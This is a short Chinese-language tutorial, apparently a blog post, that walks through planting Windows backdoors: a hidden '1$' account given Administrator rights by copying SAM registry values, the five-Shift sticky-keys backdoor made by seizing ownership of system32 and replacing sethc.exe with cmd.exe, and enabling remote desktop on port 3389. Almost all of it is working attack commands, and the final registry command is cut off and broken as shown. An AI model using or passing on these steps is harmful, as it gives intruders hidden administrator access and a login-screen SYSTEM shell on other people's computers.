Windows隐藏后门账号创建+SHIFT后门+远程桌面登录

875 阅读1分钟

Windows隐藏后门账号创建+SHIFT后门+远程桌面登录

net user 1$ 1 /add #创建一个用户名为1 密码为1的 隐藏账户(命令行下net user不可见)
net localgroupadministrators 1$ /add #将隐藏用户1$加入到管理员组 
net user 1$ #查看该用户的权限

YCZH1.jpg

regedit 打开注册表并且赋予admin权限给SAM文件夹 否则无法展开子目录

YCZH2.jpg

接下来展开目录 找到并导出账号和权限 此处账号的权限值为3F2

将1$用户和3F2结尾的权限导出

YCZH3.jpg

1f4 为Administrator的权限文件 1$为用户的文件 1 为用户权限的文件

YCZH4.jpg

将Administrator的权限属性F值替换至隐藏账号的权限值 这样隐藏账号就拥有Administrator的权限了

YCZH5.jpg

net user 1$ /del #删除新建的隐藏账户

YCZH6.jpg

net user #查看当前有哪些用户 这里可以看到目前没有看到1$隐藏用户 并且在计算机管理里也没有看到隐藏用户的存在
net user 1$ #查看1$隐藏账户信息

YCZH8.jpg

此时在去除Administrator的SAM文件夹的查看权限

YCZH9.jpg

注销后 成功登录了创建的隐藏账号

YCZH10.jpg

五次SHIFT后门

takeown /f c:\windows\system32\*.* /a /r /d y #使用该命令获取文件夹的权限

ZHQX1.png

cacls c:\windows\system32\*.* /T /E /G administrators:F #获取整个文件夹及其下面子目录文件的所属权

ZHQX2.png

attrib -s -r -h sethc.exe
#+r或-r [文件名] 设置文件属性是否为只读 
#+h或-h [文件名] 设置文件属性是否隐藏
#+s或-s [文件名] 设置文件属性是否为系统文件

copy cmd.exe sethc.exe #替换sethc这个文件为CMD命令行

ZHQX3.png

在用户登录界面 连续五下SHIFT成功弹出CMD命令界面

ZHQX4.png

开启3389端口进行远程登录

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSCo #在CMD执行该命令打开3389端口

成功通过MSTSC连上WIN7

ZHQX5.png

@星旧学长